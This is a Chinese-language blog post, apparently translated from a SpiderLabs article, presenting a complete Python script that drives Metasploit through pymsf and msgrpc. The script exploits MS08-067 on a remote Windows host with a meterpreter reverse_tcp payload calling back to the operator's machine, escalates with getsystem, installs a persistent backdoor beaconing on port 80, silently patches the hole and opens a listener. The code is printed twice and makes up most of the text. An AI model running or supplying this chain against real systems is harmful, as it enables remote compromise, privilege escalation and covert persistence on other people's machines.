本文介绍了如何使用Python的pymsf库与Metasploit的msgrpc服务进行交互,实现自动化漏洞利用和后期开发任务。首先,通过msfrpc类实例化和登录msgrpc服务器,创建虚拟控制台。接着,构造多行命令字符串,执行exploit MS08-067,并创建资源文件以执行权限提升、持久化连接和补丁安装。最后,设置监听器等待持久连接。整个过程展示了如何在Python中自动化Metasploit的高级操作。
Spiderlabs的Python模块pymsf允许Python和Metasploit的msgrpc之间的交互。首先,您需要加载msfconsole并使用以下命令启动msgrpc服务:
加载msgrpc Pass = <密码>
与msgrpc交互类似于与msfconsole的交互。首先,创建msfrpc类的实例,登录msgrpc服务器,然后创建虚拟控制台。然后,您可以开始创建包含要在虚拟控制台上执行的命令的多个行字符串。您可以使用call方法使用'console.write'执行命令,并使用'console.read'读取输出。这篇文章将演示如何利用pymsf模块启动漏洞利用和一些后期开发任务。
这里定义了一个函数,它创建一个msfrpc实例,登录到msgrpc服务器,并创建一个虚拟控制台:def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress = client.call('console.create')
console_id = ress['id']
接下来,将创建一个包含要发送到虚拟控制台的命令的多行字符串。然后我们使用console.write将字符串传递给虚拟控制台,并使用console.read读取输出:## Exploit MS08-067 ##commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession falseexploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('n')
此代码段创建MSF资源文件,允许您从“resource ”文件运行一系列命令。稍后我们将执行创建的资源文件,该资源文件将使用“getsystem”提升权限,然后创建一个meterpreter后门,将通过“run persistence ...”信号返回到端口80上的LHOST,上传针对被利用的漏洞的补丁,最后以非用户交互模式安装补丁:# Function to create the MSF .rc files
def builder(RHOST, LHOST, LPORT):
post = open('/tmp/smbpost.rc', 'w')
bat = open('/tmp/ms08067_install.bat', 'w')
postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\
upload /tmp/ms08067_patch.exe c:\
upload /tmp/ms08067_install.bat c:\
execute -f ms08067_install.bat
"""
batcomm = "ms08067_patch.exe /quiet"
post.write(postcomms); bat.write(batcomm)
post.close(); bat.close()
这使用上面代码中构建的.rc文件,并使用msf模块“post / multi / gather / run_console_rc_file”在当前的meterpreter会话中运行它们。这些命令使用console.write写入控制台,并使用console.read从虚拟控制台读取:## Run Post-exploit script ##
runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
print "[+] Running post-exploit script on: "+RHOST
client.call('console.write',[console_id,runPost])
rres = client.call('console.read',[console_id])
## Setup Listener for presistent connection back over port 80 ##
sleep(10)
listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
print "[+] Setting up listener on: "+LHOST+":80"
client.call('console.write',[console_id,listen])
lres = client.call('console.read',[console_id])
print lres
变量(RHOST,LHOST,LPORT等)在命令行中使用optparse模块给出。完成的脚本可以在我们的github上找到,请记住脚本的某些部分是静态的,例如在/ tmp /目录中有ms08067补丁。这更像是为您自己的msf自动化需求而修改的概念代码的证明。我们建议您使用此博客文章作为自己在MSF中自动执行简单操作的动机:import os, msfrpc, optparse, sys, subprocess
from time import sleep
# Function to create the MSF .rc files
def builder(RHOST, LHOST, LPORT):
post = open('/tmp/smbpost.rc', 'w')
bat = open('/tmp/ms08067_install.bat', 'w')
postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\
upload /tmp/ms08067_patch.exe c:\
upload /tmp/ms08067_install.bat c:\
execute -f ms08067_install.bat
"""
batcomm = "ms08067_patch.exe /quiet"
post.write(postcomms); bat.write(batcomm)
post.close(); bat.close()
# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patch
def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress = client.call('console.create')
console_id = ress['id']
## Exploit MS08-067 ##
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('n')
## Run Post-exploit script ##
runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
print "[+] Running post-exploit script on: "+RHOST
client.call('console.write',[console_id,runPost])
rres = client.call('console.read',[console_id])
## Setup Listener for presistent connection back over port 80 ##
sleep(10)
listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
print "[+] Setting up listener on: "+LHOST+":80"
client.call('console.write',[console_id,listen])
lres = client.call('console.read',[console_id])
print lres
def main():
parser = optparse.OptionParser(sys.argv[0] +
' -p LPORT -r RHOST -l LHOST')
parser.add_option('-p', dest='LPORT', type='string',
help ='specify a port to listen on')
parser.add_option('-r', dest='RHOST', type='string',
help='Specify a remote host')
parser.add_option('-l', dest='LHOST', type='string',
help='Specify a local host')
parser.add_option('-s', dest='session', type='string',
help ='specify session ID')
(options, args) = parser.parse_args()
session=options.session
RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
if (RHOST == None) and (LPORT == None) and (LHOST == None):
print parser.usage
sys.exit(0)
builder(RHOST, LHOST, LPORT)
sploiter(RHOST, LHOST, LPORT, session)
if __name__ == "__main__":
main()
扫一扫
2232
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
